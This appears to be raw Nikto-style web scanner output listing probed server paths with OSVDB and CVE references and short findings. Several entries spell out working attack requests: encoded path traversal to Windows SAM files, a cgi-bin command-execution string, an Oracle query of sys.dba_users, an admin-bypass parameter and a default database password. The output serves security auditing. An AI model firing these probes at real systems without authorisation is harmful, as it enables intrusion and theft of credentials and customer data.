+ OSVDB-3233: /_vti_bin/: FrontPage directory found.
+ OSVDB-3233: /_vti_bin/admin.pl: Default FrontPage CGI found.
+ OSVDB-3233: /_vti_bin/contents.htm: Default FrontPage CGI found.
+ OSVDB-3233: /_vti_bin/fpadmin.htm: Default FrontPage CGI found.
+ OSVDB-3233: /_vti_bin/_vti_cnf/: FrontPage directory found.
+ OSVDB-3233: /_vti_cnf/_vti_cnf/: FrontPage directory found.
+ OSVDB-3233: /_vti_log/_vti_cnf/: FrontPage directory found.
+ OSVDB-3233: /_vti_pvt/administrators.pwd: Default FrontPage file found, may be a password file.
+ OSVDB-3233: /_vti_pvt/authors.pwd: Default FrontPage file found, may be a password file.
+ OSVDB-3233: /_vti_pvt/service.pwd: Default FrontPage file found, may be a password file.
+ OSVDB-3233: /_vti_pvt/users.pwd: Default FrontPage file found, may be a password file.
+ OSVDB-3233: /help/contents.htm: Default Netscape manual found. All default pages should be removed.
+ OSVDB-3233: /help/home.html: Default Netscape manual found. All default pages should be removed.
+ OSVDB-3233: /manual/ag/esperfrm.htm: Default Netscape manual found. All default pages should be removed.
+ OSVDB-3233: /nethome/: Netscape Enterprise Server default doc/manual directory. Reveals server path at bottom of page.
+ OSVDB-3233: /com/novell/gwmonitor/help/en/default.htm: Netware gateway monitor access documentation found. All default documentation should be removed from web servers.
+ OSVDB-3233: /com/novell/webaccess/help/en/default.htm: Netware web access documentation found. All default documentation should be removed from web servers.
+ OSVDB-3233: /com/novell/webpublisher/help/en/default.htm: Netware web publisher documentation found. All default documentation should be removed from web servers.
+ OSVDB-3233: /servlet/AdminServlet: Netware Web Search Server (adminservlet) found. All default code should be removed from web servers.
+ OSVDB-3233: /servlet/gwmonitor: Netware Gateway monitor found. All default code should be removed from web servers.
+ OSVDB-3233: /servlet/PrintServlet: Novell Netware default servlet found. All default code should be removed from the system.
+ OSVDB-3233: /servlet/SearchServlet: Novell Netware default servlet found. All default code should be removed from the system.
+ OSVDB-3233: /servlet/sq1cdsn: Novell Netware default servlet found. All default code should be removed from the system.
+ OSVDB-3233: /servlet/webacc: Netware Enterprise and/or GroupWise web access found. All default code should be removed from Internet servers.
+ OSVDB-3233: /servlet/webpub: Netware Web Publisher found. All default code should be removed from web servers.
+ OSVDB-3233: /WebSphereSamples: Netware Webshere sample applications found. All default code should be removed from web servers.
+ OSVDB-3233: /doc/domguide.nsf: This documentation database can be read without authentication. All default files should be removed.
+ OSVDB-3233: /doc/dspug.nsf: This documentation database can be read without authentication. All default files should be removed.
+ OSVDB-3233: /doc/help4.nsf: This documentation database can be read without authentication. All default files should be removed.
+ OSVDB-3233: /doc/helpadmin.nsf: This documentation database can be read without authentication. All default files should be removed.
+ OSVDB-3233: /doc/helplt4.nsf: This documentation database can be read without authentication. All default files should be removed.
+ OSVDB-3233: /doc/internet.nsf: This documentation database can be read without authentication. All default files should be removed.
+ OSVDB-3233: /doc/javapg.nsf: This documentation database can be read without authentication. All default files should be removed.
+ OSVDB-3233: /doc/lccon.nsf: This documentation database can be read without authentication. All default files should be removed.
+ OSVDB-3233: /doc/migrate.nsf: This documentation database can be read without authentication. All default files should be removed.
+ OSVDB-3233: /doc/npn_admn.nsf: This documentation database can be read without authentication. All default files should be removed.
+ OSVDB-3233: /doc/npn_rn.nsf: This documentation database can be read without authentication. All default files should be removed.
+ OSVDB-3233: /doc/readmec.nsf: This documentation database can be read without authentication. All default files should be removed.
+ OSVDB-3233: /doc/readmes.nsf: This documentation database can be read without authentication. All default files should be removed.
+ OSVDB-3233: /doc/smhelp.nsf: This documentation database can be read without authentication. All default files should be removed.
+ OSVDB-3233: /doc/srvinst.nsf: This documentation database can be read without authentication. All default files should be removed.
+ OSVDB-3233: /domguide.nsf: This documentation database can be read without authentication. All default files should be removed.
+ OSVDB-3233: /dspug.nsf: This documentation database can be read without authentication. All default files should be removed.
+ OSVDB-3233: /help/domguide.nsf: This documentation database can be read without authentication. All default files should be removed.
+ OSVDB-3233: /help/dspug.nsf: This documentation database can be read without authentication. All default files should be removed.
+ OSVDB-3233: /help/help4.nsf: This documentation database can be read without authentication. All default files should be removed.
+ OSVDB-3233: /help/helpadmin.nsf: This documentation database can be read without authentication. All default files should be removed.
+ OSVDB-3233: /help/helplt4.nsf: This documentation database can be read without authentication. All default files should be removed.
+ OSVDB-3233: /help/internet.nsf: This documentation database can be read without authentication. All default files should be removed.
+ OSVDB-3233: /help/javapg.nsf: This documentation database can be read without authentication. All default files should be removed.
+ OSVDB-3233: /help/lccon.nsf: This documentation database can be read without authentication. All default files should be removed.
+ OSVDB-3233: /help/migrate.nsf: This documentation database can be read without authentication. All default files should be removed.
+ OSVDB-3233: /help/npn_admn.nsf: This documentation database can be read without authentication. All default files should be removed.
+ OSVDB-3233: /help/npn_rn.nsf: This documentation database can be read without authentication. All default files should be removed.
+ OSVDB-3233: /help/readmec.nsf: This documentation database can be read without authentication. All default files should be removed.
+ OSVDB-3233: /help/readmes.nsf: This documentation database can be read without authentication. All default files should be removed.
+ OSVDB-3233: /help/smhelp.nsf: This documentation database can be read without authentication. All default files should be removed.
+ OSVDB-3233: /help/srvinst.nsf: This documentation database can be read without authentication. All default files should be removed.
+ OSVDB-3233: /help4.nsf: This documentation database can be read without authentication. All default files should be removed.
+ OSVDB-3233: /helpadmin.nsf: This documentation database can be read without authentication. All default files should be removed.
+ OSVDB-3233: /helplt4.nsf: This documentation database can be read without authentication. All default files should be removed.
+ OSVDB-3233: /internet.nsf: This documentation database can be read without authentication. All default files should be removed.
+ OSVDB-3233: /javapg.nsf: This documentation database can be read without authentication. All default files should be removed.
+ OSVDB-3233: /lccon.nsf: This documentation database can be read without authentication. All default files should be removed.
+ OSVDB-3233: /migrate.nsf: This documentation database can be read without authentication. All default files should be removed. 
+ OSVDB-3233: /npn_admn.nsf: This documentation database can be read without authentication. All default files should be removed.
+ OSVDB-3233: /npn_rn.nsf: This documentation database can be read without authentication. All default files should be removed.
+ OSVDB-3233: /readmec.nsf: This documentation database can be read without authentication. All default files should be removed.
+ OSVDB-3233: /readmes.nsf: This documentation database can be read without authentication. All default files should be removed.
+ OSVDB-3233: /smhelp.nsf: This documentation database can be read without authentication. All default files should be removed.
+ OSVDB-3233: /srvinst.nsf: This documentation database can be read without authentication. All default files should be removed.
+ OSVDB-3233: /index.html.ca: Apache default foreign language file found. All default files should be removed from the web server as they may give an attacker additional system information.
+ OSVDB-3233: /index.html.cz.iso8859-2: Apache default foreign language file found. All default files should be removed from the web server as they may give an attacker additional system information.
+ OSVDB-3233: /index.html.de: Apache default foreign language file found. All default files should be removed from the web server as they may give an attacker additional system information.
+ OSVDB-3233: /index.html.dk: Apache default foreign language file found. All default files should be removed from the web server as they may give an attacker additional system information.
+ OSVDB-3233: /index.html.ee: Apache default foreign language file found. All default files should be removed from the web server as they may give an attacker additional system information.
+ OSVDB-3233: /index.html.el: Apache default foreign language file found. All default files should be removed from the web server as they may give an attacker additional system information.
+ OSVDB-3233: /index.html.en: Apache default foreign language file found. All default files should be removed from the web server as they may give an attacker additional system information.
+ OSVDB-3233: /index.html.es: Apache default foreign language file found. All default files should be removed from the web server as they may give an attacker additional system information.
+ OSVDB-3233: /index.html.et: Apache default foreign language file found. All default files should be removed from the web server as they may give an attacker additional system information.
+ OSVDB-3233: /index.html.fr: Apache default foreign language file found. All default files should be removed from the web server as they may give an attacker additional system information.
+ OSVDB-3233: /index.html.he.iso8859-8: Apache default foreign language file found. All default files should be removed from the web server as they may give an attacker additional system information.
+ OSVDB-3233: /index.html.hr.iso8859-2: Apache default foreign language file found. All default files should be removed from the web server as they may give an attacker additional system information.
+ OSVDB-3233: /index.html.it: Apache default foreign language file found. All default files should be removed from the web server as they may give an attacker additional system information.
+ OSVDB-3233: /index.html.ja.iso2022-jp: Apache default foreign language file found. All default files should be removed from the web server as they may give an attacker additional system information.
+ OSVDB-3233: /index.html.kr.iso2022-kr: Apache default foreign language file found. All default files should be removed from the web server as they may give an attacker additional system information.
+ OSVDB-3233: /index.html.ltz.utf8: Apache default foreign language file found. All default files should be removed from the web server as they may give an attacker additional system information.
+ OSVDB-3233: /index.html.lu.utf8: Apache default foreign language file found. All default files should be removed from the web server as they may give an attacker additional system information.
+ OSVDB-3233: /index.html.nl: Apache default foreign language file found. All default files should be removed from the web server as they may give an attacker additional system information.
+ OSVDB-3233: /index.html.nn: Apache default foreign language file found. All default files should be removed from the web server as they may give an attacker additional system information.
+ OSVDB-3233: /index.html.no: Apache default foreign language file found. All default files should be removed from the web server as they may give an attacker additional system information.
+ OSVDB-3233: /index.html.po.iso8859-2: Apache default foreign language file found. All default files should be removed from the web server as they may give an attacker additional system information.
+ OSVDB-3233: /index.html.pt: Apache default foreign language file found. All default files should be removed from the web server as they may give an attacker additional system information.
+ OSVDB-3233: /index.html.pt-br: Apache default foreign language file found. All default files should be removed from the web server as they may give an attacker additional system information.
+ OSVDB-3233: /index.html.ru.cp-1251: Apache default foreign language file found. All default files should be removed from the web server as they may give an attacker additional system information.
+ OSVDB-3233: /index.html.ru.cp866: Apache default foreign language file found. All default files should be removed from the web server as they may give an attacker additional system information.
+ OSVDB-3233: /index.html.ru.iso-ru: Apache default foreign language file found. All default files should be removed from the web server as they may give an attacker additional system information.
+ OSVDB-3233: /index.html.ru.koi8-r: Apache default foreign language file found. All default files should be removed from the web server as they may give an attacker additional system information.
+ OSVDB-3233: /index.html.ru.utf8: Apache default foreign language file found. All default files should be removed from the web server as they may give an attacker additional system information.
+ OSVDB-3233: /index.html.se: Apache default foreign language file found. All default files should be removed from the web server as they may give an attacker additional system information.
+ OSVDB-3233: /index.html.tw: Apache default foreign language file found. All default files should be removed from the web server as they may give an attacker additional system information.
+ OSVDB-3233: /index.html.tw.Big5: Apache default foreign language file found. All default files should be removed from the web server as they may give an attacker additional system information.
+ OSVDB-3233: /index.html.var: Apache default foreign language file found. All default files should be removed from the web server as they may give an attacker additional system information.
+ OSVDB-3233: /iissamples/sdk/asp/docs/codebrw2.asp: This is a default IIS script/file that should be removed. CVE-1999-0739. http://www.microsoft.com/technet/security/bulletin/MS99-013.asp.
+ OSVDB-3233: /iissamples/sdk/asp/docs/codebrws.asp: This is a default IIS script/file that should be removed. CVE-1999-0739. http://www.microsoft.com/technet/security/bulletin/MS99-013.asp.
+ OSVDB-3233: /a/: May be Kebi Web Mail administration menu.
+ OSVDB-3233: /basilix/: BasiliX webmail application. Default mysql database name is 'BASILIX' with password 'bsxpass'
+ OSVDB-3233: /interchange/: Interchange chat is installed. Look for a high-numbered port like 20xx to find it running.
+ OSVDB-3282: /uploader.php: This script may allow arbitrary files to be uploaded to the remote server.
+ OSVDB-3286: /conspass.chl+: Abyss allows hidden/protected files to be served if a + is added to the request. CVE-2002-1081
+ OSVDB-3286: /consport.chl+: Abyss allows hidden/protected files to be served if a + is added to the request. CVE-2002-1081
+ OSVDB-3286: /general.chl+: Abyss allows hidden/protected files to be served if a + is added to the request. CVE-2002-1081
+ OSVDB-3286: /srvstatus.chl+: Abyss allows hidden/protected files to be served if a + is added to the request. CVE-2002-1081
+ OSVDB-3396: /mlog.html: Remote file read vulnerability 1999-0068
+ OSVDB-3396: /mlog.phtml: Remote file read vulnerability 1999-0068
+ OSVDB-3396: /php/mlog.html: Remote file read vulnerability 1999-0346
+ OSVDB-3396: /php/mlog.phtml: Remote file read vulnerability 1999-0346
+ OSVDB-3489: /surf/scwebusers: SurfControl SuperScout Web Reports Server user and password file is available. CVE-2002-0705.
+ OSVDB-3501: /_private/form_results.htm: This file may contain information submitted by other web users via forms. CVE-1999-1052.
+ OSVDB-3501: /_private/form_results.html: This file may contain information submitted by other web users via forms. CVE-1999-1052.
+ OSVDB-3591: /project/index.php?m=projects&user_cookie=1: dotProject 0.2.1.5 may allow admin login bypass by adding the user_cookie=1 to the URL.
+ OSVDB-379: /site/eg/source.asp: This ASP (installed with Apache::ASP) allows attackers to upload files to the server. Upgrade to 1.95 or higher. CVE-2000-0628.
+ OSVDB-4: /iissamples/exair/search/advsearch.asp: Scripts within the Exair package on IIS 4 can be used for a DoS against the server. CVE-1999-0449. BID-193.
+ OSVDB-4013: /isqlplus: Oracle iSQL*Plus is installed. This may be vulnerable to a buffer overflow in the user ID field. http://www.ngssoftware.com/advisories/ora-isqlplus.txt
+ OSVDB-4161: /userlog.php: Teekai's Tracking Online 1.0 log can be retrieved remotely.
+ OSVDB-4171: /ASP/cart/database/metacart.mdb: MetaCart2 is an ASP shopping cart. The database of customers is available via the web.
+ OSVDB-4171: /database/metacart.mdb: MetaCart2 is an ASP shopping cart. The database of customers is available via the web.
+ OSVDB-4171: /mcartfree/database/metacart.mdb: MetaCart2 is an ASP shopping cart. The database of customers is available via the web.
+ OSVDB-4171: /metacart/database/metacart.mdb: MetaCart2 is an ASP shopping cart. The database of customers is available via the web.
+ OSVDB-4171: /shop/database/metacart.mdb: MetaCart2 is an ASP shopping cart. The database of customers is available via the web.
+ OSVDB-4171: /shoponline/fpdb/shop.mdb: MetaCart2 is an ASP shopping cart. The database of customers is available via the web.
+ OSVDB-4171: /shopping/database/metacart.mdb: MetaCart2 is an ASP shopping cart. The database of customers is available via the web.
+ OSVDB-4237: /ban.bak: Bannermatic versions 1-3 reveal sensitive information from unprotected files. These files should be protected.
+ OSVDB-4237: /ban.dat: Bannermatic versions 1-3 reveal sensitive information from unprotected files. These files should be protected.
+ OSVDB-4237: /ban.log: Bannermatic versions 1-3 reveal sensitive information from unprotected files. These files should be protected.
+ OSVDB-4237: /banmat.pwd: Bannermatic versions 1-3 reveal sensitive information from unprotected files. These files should be protected.
+ OSVDB-4238: /admin/adminproc.asp: Xpede administration page may be available. The /admin directory should be protected.
+ OSVDB-4239: /admin/datasource.asp: Xpede page reveals SQL account name. The /admin directory should be protected.
+ OSVDB-4240: /utils/sprc.asp: Xpede page may allow SQL injection.
+ OSVDB-4314: /texis.exe/?-dump: Texis installation may reveal sensitive information.
+ OSVDB-4314: /texis.exe/?-version: Texis installation may reveal sensitive information.
+ OSVDB-4360: /acart2_0/acart2_0.mdb: Alan Ward A-Cart 2.0 allows remote user to read customer database file which may contain usernames, passwords, credit cards and more.
+ OSVDB-4361: /acart2_0/admin/category.asp: Alan Ward A-Cart 2.0 is vulnerable to an XSS attack which may cause the administrator to delete database information.
+ OSVDB-474: /Sites/Knowledge/Membership/Inspired/ViewCode.asp: The default ViewCode.asp can allow an attacker to read any file on the machine. CVE-1999-0737. http://www.microsoft.com/technet/security/bulletin/MS99-013.asp.
+ OSVDB-474: /Sites/Knowledge/Membership/Inspiredtutorial/ViewCode.asp: The default ViewCode.asp can allow an attacker to read any file on the machine. CVE-1999-0737. http://www.microsoft.com/technet/security/bulletin/MS99-013.asp.
+ OSVDB-474: /Sites/Samples/Knowledge/Membership/Inspired/ViewCode.asp: The default ViewCode.asp can allow an attacker to read any file on the machine. CVE-1999-0737. http://www.microsoft.com/technet/security/bulletin/MS99-013.asp.
+ OSVDB-474: /Sites/Samples/Knowledge/Membership/Inspiredtutorial/ViewCode.asp: The default ViewCode.asp can allow an attacker to read any file on the machine. CVE-1999-0737. http://www.microsoft.com/technet/security/bulletin/MS99-013.asp.
+ OSVDB-474: /Sites/Samples/Knowledge/Push/ViewCode.asp: The default ViewCode.asp can allow an attacker to read any file on the machine. CVE-1999-0737. http://www.microsoft.com/technet/security/bulletin/MS99-013.asp.
+ OSVDB-474: /Sites/Samples/Knowledge/Search/ViewCode.asp: The default ViewCode.asp can allow an attacker to read any file on the machine. CVE-1999-0737. http://www.microsoft.com/technet/security/bulletin/MS99-013.asp.
+ OSVDB-474: /SiteServer/Publishing/ViewCode.asp: The default ViewCode.asp can allow an attacker to read any file on the machine. CVE-1999-0737. http://www.microsoft.com/technet/security/bulletin/MS99-013.asp.
+ OSVDB-17671: /siteserver/publishing/viewcode.asp?source=/default.asp: May be able to view source code using Site Server vulnerability.
+ OSVDB-4908: /securelogin/1,2345,A,00.html: Vignette Story Server v4.1, 6, may disclose sensitive information via a buffer overflow.
+ OSVDB-5092: /config.inc: DotBr 0.1 configuration file includes usernames and passwords.
+ OSVDB-5095: /sysuser/docmgr/ieedit.stm?url=../: Sambar default file may allow directory listings.
+ OSVDB-5096: /sysuser/docmgr/iecreate.stm?template=../: Sambar default file may allow directory listings.
+ OSVDB-539: /catinfo: May be vulnerable to a buffer overflow. Request '/catinfo?' and add on 2048 of garbage to test.
+ OSVDB-5407: /soap/servlet/soaprouter: Oracle 9iAS SOAP components allow anonymous users to deploy applications by default.
+ OSVDB-5523: /MWS/HandleSearch.html?searchTarget=test&B1=Submit: MyWebServer 1.0.2 may be vulnerable to a buffer overflow (untested). Upgrade to a later version if 990b of searched data crashes the server.
+ OSVDB-562: /server-info: This gives a lot of Apache information. Comment out appropriate line in httpd.conf or restrict access to allowed hosts.
+ OSVDB-5709: /.nsconfig: Contains authorization information
+ OSVDB-583: /cgi-bin/%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2F%57%69%6E%64%6F%77%73%2Fping.exe%20127.0.0.1: Specially formatted strings allow command execution. Upgrade to version 1.15 or higher. CVE-2000-0011.
+ OSVDB-6670: /applist.asp: Citrix server may allow remote users to view applications installed without authenticating.
+ OSVDB-6671: /launch.asp?NFuse_Application=LookOut&NFuse_MIMEExtension=.ica: Citrix server may reveal sensitive information by accessing the 'advanced' tab on hte login screen.
+ OSVDB-6672: /_layouts/alllibs.htm: Microsoft SharePoint Portal and Team Services vulnerable to NT or NTLM authentication bypass on Win2000 SP4 using IE 6.x. Bugtraq 03-11-19 post by [email protected]
+ OSVDB-6672: /_layouts/settings.htm: Microsoft SharePoint Portal and Team Services vulnerable to NT or NTLM authentication bypass on Win2000 SP4 using IE 6.x. Bugtraq 03-11-19 post by [email protected]
+ OSVDB-6672: /_layouts/userinfo.htm: Microsoft SharePoint Portal and Team Services vulnerable to NT or NTLM authentication bypass on Win2000 SP4 using IE 6.x. Bugtraq 03-11-19 post by [email protected]
+ OSVDB-670: /stronghold-info: Redhat Stronghold from versions 2.3 up to 3.0 discloses sensitive information. This gives information on configuration. CVE-2001-0868.
+ OSVDB-670: /stronghold-status: Redhat Stronghold from versions 2.3 up to 3.0 discloses sensitive information. CVE-2001-0868.
+ OSVDB-7: /iissamples/exair/howitworks/Code.asp: Scripts within the Exair package on IIS 4 can be used for a DoS against the server. CVE-1999-0449. BID-193.
+ OSVDB-7: /iissamples/exair/howitworks/Codebrw1.asp: This is a default IIS script/file which should be  removed, it may allow a DoS against the server. CVE-1999-0738. http://www.microsoft.com/technet/security/bulletin/MS99-013.asp. CVE-1999-0449. BID-193.
+ OSVDB-707: /globals.jsa: Oracle globals.jsa file
+ OSVDB-721: /..%252f..%252f..%252f..%252f..%252f../windows/repair/sam: BadBlue server is vulnerable to multiple remote exploits. See http://www.securiteam.com/exploits/5HP0M2A60G.html for more information.
+ OSVDB-721: /..%252f..%252f..%252f..%252f..%252f../winnt/repair/sam: BadBlue server is vulnerable to multiple remote exploits. See http://www.securiteam.com/exploits/5HP0M2A60G.html for more information.
+ OSVDB-721: /..%252f..%252f..%252f..%252f..%252f../winnt/repair/sam._: BadBlue server is vulnerable to multiple remote exploits. See http://www.securiteam.com/exploits/5HP0M2A60G.html for more information.
+ OSVDB-721: /..%255c..%255c..%255c..%255c..%255c../windows/repair/sam: BadBlue server is vulnerable to multiple remote exploits. See http://www.securiteam.com/exploits/5HP0M2A60G.html for more information.
+ OSVDB-721: /..%255c..%255c..%255c..%255c..%255c../winnt/repair/sam: BadBlue server is vulnerable to multiple remote exploits. See http://www.securiteam.com/exploits/5HP0M2A60G.html for more information.
+ OSVDB-721: /..%255c..%255c..%255c..%255c..%255c../winnt/repair/sam._: BadBlue server is vulnerable to multiple remote exploits. See http://www.securiteam.com/exploits/5HP0M2A60G.html for more information.
+ OSVDB-721: /..%2F..%2F..%2F..%2F..%2F../windows/repair/sam: BadBlue server is vulnerable to multiple remote exploits. See http://www.securiteam.com/exploits/5HP0M2A60G.html for more information.
+ OSVDB-721: /..%2F..%2F..%2F..%2F..%2F../winnt/repair/sam: BadBlue server is vulnerable to multiple remote exploits. See http://www.securiteam.com/exploits/5HP0M2A60G.html for more information.
+ OSVDB-721: /..%2F..%2F..%2F..%2F..%2F../winnt/repair/sam._: BadBlue server is vulnerable to multiple remote exploits. See http://www.securiteam.com/exploits/5HP0M2A60G.html for more information.
+ OSVDB-789: /iissamples/sdk/asp/docs/CodeBrws.asp?Source=/IISSAMPLES/%c0%ae%c0%ae/default.asp: IIS may be vulnerable to source code viewing via the example CodeBrws.asp file. Remove all default files from the web root. CVE-1999-0739. http://www.microsoft.com/technet/security/bulletin/MS99-013.asp.
+ OSVDB-9624: /pass_done.php: PY-Membres 4.2 may allow users to execute a query which generates a list of usernames and passwords.
+ OSVDB-9624: /admin/admin.php?adminpy=1: PY-Membres 4.2 may allow administrator access.
+ OSVDB-3092: /README: README file found.
+ OSVDB-3233: /j2ee/: j2ee directory found--possibly an Oracle app server directory.
+ OSVDB-3233: /WebCacheDemo.html: Oracle WebCache Demo
+ OSVDB-32333: /webcache/: Oracle WebCache Demo
+ OSVDB-3233: /bmp/: SQLJ Demo Application
+ OSVDB-3233: /bmp/JSPClient.java: SQLJ Demo Application
+ OSVDB-3233: /bmp/mime.types: SQLJ Demo Application
+ OSVDB-3233: /bmp/sqljdemo.jsp: SQLJ Demo Application
+ OSVDB-3233: /bmp/setconn.jsp: SQLJ Demo Application
+ OSVDB-3233: /ptg_upgrade_pkg.log: Oracle log files.
+ OSVDB-3233: /OA_HTML/oam/weboam.log: Oracle log files.
+ OSVDB-3233: /webapp/admin/_pages/_bc4jadmin/: Oracle JSP files
+ OSVDB-3233: /_pages/_webapp/_admin/_showpooldetails.java: Oracle JSP files
+ OSVDB-3233: /_pages/_webapp/_admin/_showjavartdetails.java: Oracle JSP file
+ OSVDB-3233: /_pages/_demo/: Oracle JSP file
+ OSVDB-3233: /_pages/_webapp/_jsp/: Oracle JSP file.
+ OSVDB-3233: /_pages/_demo/_sql/: Oracle JSP file.
+ OSVDB-3233: //OA_HTML/_pages/: Oracle JSP file.
+ OSVDB-3233: /OA_HTML/webtools/doc/index.html: Cabo DHTML Components Help Page
+ OSVDB-18114: /reports/rwservlet?server=repserv+report=/tmp/hacker.rdf+destype=cache+desformat=PDF:  Oracle Reports rwservlet report Variable Arbitrary Report Executable Execution
+ OSVDB-3233: /apex/: Oracle Application Express login screen.
+ OSVDB-3233: /OA_JAVA/: Oracle Applications Portal Page
+ OSVDB-3233: /OA_HTML/: Oracle Applications Portal Page
+ OSVDB-3233: /aplogon.html: Oracle Applications Portal Page
+ OSVDB-3233: /appdet.html: Oracle Applications Portal Pages
+ OSVDB-3233: /servlets/weboam/oam/oamLogin: Oracle Application Manager
+ OSVDB-3233: /OA_HTML/PTB/mwa_readme.htm: Oracle Mobile Applications Industrial Server administration and configuration inerface
+ OSVDB-3233: /reports/rwservlet: Oracle Reports
+ OSVDB-3233: /reports/rwservlet/showenv: Oracle Reports
+ OSVDB-3233: /reports/rwservlet/showmap: Oracle Reports
+ OSVDB-3233: /reports/rwservlet/showjobs: Oracle Reports
+ OSVDB-3233: /reports/rwservlet/getjobid7?server=myrep: Oracle Reports
+ OSVDB-3233: /reports/rwservlet/getjobid4?server=myrep: Oracle Reports
+ OSVDB-3233: /reports/rwservlet/showmap?server=myserver: Oracle Reports
+ OSVDB-3093: /pls/portal/owa_util.cellsprint?p_theQuery=select: Direct access to Oracle packages could have an unkown impact.
+ OSVDB-3093: /pls/portal/owa_util.listprint?p_theQuery=select: Access to Oracle pages could have an unknown impact.
+ OSVDB-3093: /pls/portal/owa_util.show_query_columns?ctable=sys.dba_users: Access to Oracle pages could have an unknown impact.
+ OSVDB-3093: /pls/portal/owa_util.showsource?cname=owa_util: Access to Oracle pages could have an unknown impact.
+ OSVDB-3093: /pls/portal/owa_util.cellsprint?p_theQuery=select+*+from+sys.dba_users: Access to Oracle pages could have an unknown impact.			
+ OSVDB-3093: /pls/portal/owa_util.signature: Access to Oracle pages could have an unknown impact.					
+ OSVDB-3093: /pls/portal/HTP.PRINT: Access to Oracle pages could have an unknown impact.					
+ OSVDB-3093: /pls/portal/CXTSYS.DRILOAD.VALIDATE_STMT: Access to Oracle pages could have an unknown impact.					
+ OSVDB-3093: /pls/portal/PORTAL_DEMO.ORG_CHART.SHOW: Access to Oracle pages could have an unknown impact.					
+ OSVDB-3093: /pls/portal/PORTAL.wwv_form.genpopuplist: Access to Oracle pages cold have an unknown impact.					
+ OSVDB-3093: /pls/portal/PORTAL.wwv_ui_lovf.show: Access to Oracle pages could have an unknown impact.					
+ OSVDB-3093: /pls/portal/PORTAL.wwa_app_module.link: Access to Oracle pages could have an unknown impact.					
+ OSVDB-3093: /pls/portal/PORTAL.wwv_dynxml_generator.show: Access to Oracle pages could have an unknown impact.					
+ OSVDB-3093: /pls/portal/PORTAL.home: Access to Oracle pages could have an unknown impact.					
+ OSVDB-3093: /pls/portal/PORTAL.wwv_setting.render_css: Access to Oracle pages could have an unknown impact.					
+ OSVDB-3093: /pls/portal/PORTAL.wwv_main.render_warning_screen?p_oldurl=inTellectPRO&p_newurl=inTellectPRO: Access to Oracle pages could have an unknown impact.					
+ OSVDB-3093: /pls/portal/SELECT: Access to Oracle pages could have an unknown impact.					
+ OSVDB-3093: /pls/portal/null: Access to Oracle pages could have an unknown impact.					
+ OSVDB-3093: /OA_MEDIA/: Oracle Applications portal pages found.
+ OSVDB-3093: /OA_HTML/META-INF/: Oracle Applications portal pages found.
+ OSVDB-3093: /OA_HTML/jsp/por/services/login.jsp: Oracle Applications portal pages found.
+ OSVDB-3093: /OA_HTML/PTB/ICXINDEXBASECASE.htm: Oracle Applications portal pages found.
+ OSVDB-3093: /OA_HTML/PTB/ECXOTAPing.htm: Oracle Applications portal pages found.
+ OSVDB-3093: /OA_HTML/PTB/xml_sample1.htm: Oracle Applications portal pages found.
+ OSVDB-3093: /OA_HTML/jsp/wf/WFReassign.jsp: Oracle Applications portal pages found.
+ OSVDB-3093: /OA_JAVA/Oracle/: Oracle Applications portal pages found.
+ OSVDB-3093: /OA_JAVA/servlet.zip: Oracle Applications portal pages found.
+ OSVDB-3093: /OA_JAVA/oracle/forms/registry/Registry.dat: Oracle Applications portal pages found.
+ OSVDB-3093: /OA_HTML/oam/: Oracle Applications portal pages found.
+ OSVDB-3233: /OA_HTML/jsp/: Oracle Applications portal page found
+ OSVDB-3233: /OA_HTML/jsp/fnd/fndversion.jsp: Oracle Applications help page found.
+ OSVDB-3233: /OA_HTML/jsp/fnd/fndhelp.jsp?dbc=/u01/oracle/prodappl/fnd/11.5.0/secure/dbprod2_prod.dbc: Oracle Applications help page found.			
+ OSVDB-3233: /OA_HTML/jsp/fnd/fndhelputil.jsp: Oracle Applications help page found.
+ OSVDB-3092: /install/install.php: Install file found.
+ OSVDB-3092: /cehttp/trace: Sterling Commerce Connect Direct trace log file may contain user ID information.
+ OSVDB-3092: /cehttp/property/: Sterling Commerce Connect Direct configuration files.
+ OSVDB-3233: /nps/iManager.html: Novell iManager found.
+ OSVDB-3233: /nps/version.jsp: Novell iManager version found.
+ OSVDB-3233: /nps/servlet/webacc?taskId=dev.Empty&merge=fw.About: Novell iManager version found.
+ OSVDB-3092: /staging/: This may be interesting...
+ OSVDB-3092: /_archive/: Archive found.
+ OSVDB-3092: /install.php: install.php file found.
+ OSVDB-3092: /upgrade.php: upgrade.php was found.
+ OSVDB-3092: /xmlrpc.php: xmlrpc.php was found.
+ OSVDB-3092: /sitemap.gz: The sitemap.gz file, used for Google indexing, contains an xml representation of the web site's structure.
+ OSVDB-3092: /content/sitemap.gz: The sitemap.gz file, used for Google indexing, contains an xml representation of the web site\'s structure.
+ /webservices/IlaWebServices: Host has the Oracle iLearning environment installed.
+ /phone/: This may be interesting...
+ OSVDB-3092: /Admin/: This might be interesting...
+ OSVDB-3092: /af/: This might be interesting... potential country code (Afghanistan)
+ OSVDB-3092: /ax/: This might be interesting... potential country code (Aland Islands)
+ OSVDB-3092: /al/: This might be interesting... potential country code (Albania)
+ OSVDB-3092: /dz/: This might be interesting... potential country code (Algeria)
+ OSVDB-3092: /as/: This might be interesting... potential country code (American Samoa)
+ OSVDB-3092: /ad/: This might be interesting... potential country code (Andorra)
+ OSVDB-3092: /ao/: This might be interesting... potential country code (Angola)
+ OSVDB-3092: /ai/: This might be interesting... potential country code (Anguilla)
+ OSVDB-3092: /aq/: This might be interesting... potential country code (Antarctica)
+ OSVDB-3092: /ag/: This might be interesting... potential country code (Antigua And Barbuda)
+ OSVDB-3092: /ar/: This might be interesting... potential country code (Argentina)
+ OSVDB-3092: /am/: This might be interesting... potential country code (Armenia)
+ OSVDB-3092: /aw/: This might be interesting... potential country code (Aruba)
+ OSVDB-3092: /au/: This might be interesting... potential country code (Australia)
+ OSVDB-3092: /at/: This might be interesting... potential country code (Austria)
+ OSVDB-3092: /az/: This might be interesting... potential country code (Azerbaijan)
+ OSVDB-3092: /bs/: This might be interesting... potential country code (Bahamas)
+ OSVDB-3092: /bh/: This might be interesting... potential country code (Bahrain)
+ OSVDB-3092: /bd/: This might be interesting... potential country code (Bangladesh)
+ OSVDB-3092: /bb/: This might be interesting... potential country code (Barbados)
+ OSVDB-3092: /by/: This might be interesting... potential country code (Belarus)
+ OSVDB-3092: /be/: This might be interesting... potential country code (Belgium)
+ OSVDB-3092: /bz/: This might be interesting... potential country code (Belize)
+ OSVDB-3092: /bj/: This might be interesting... potential country code (Benin)
+ OSVDB-3092: /bm/: This might be interesting... potential country code (Bermuda)
+ OSVDB-3092: /bt/: This might be interesting... potential country code (Bhutan)
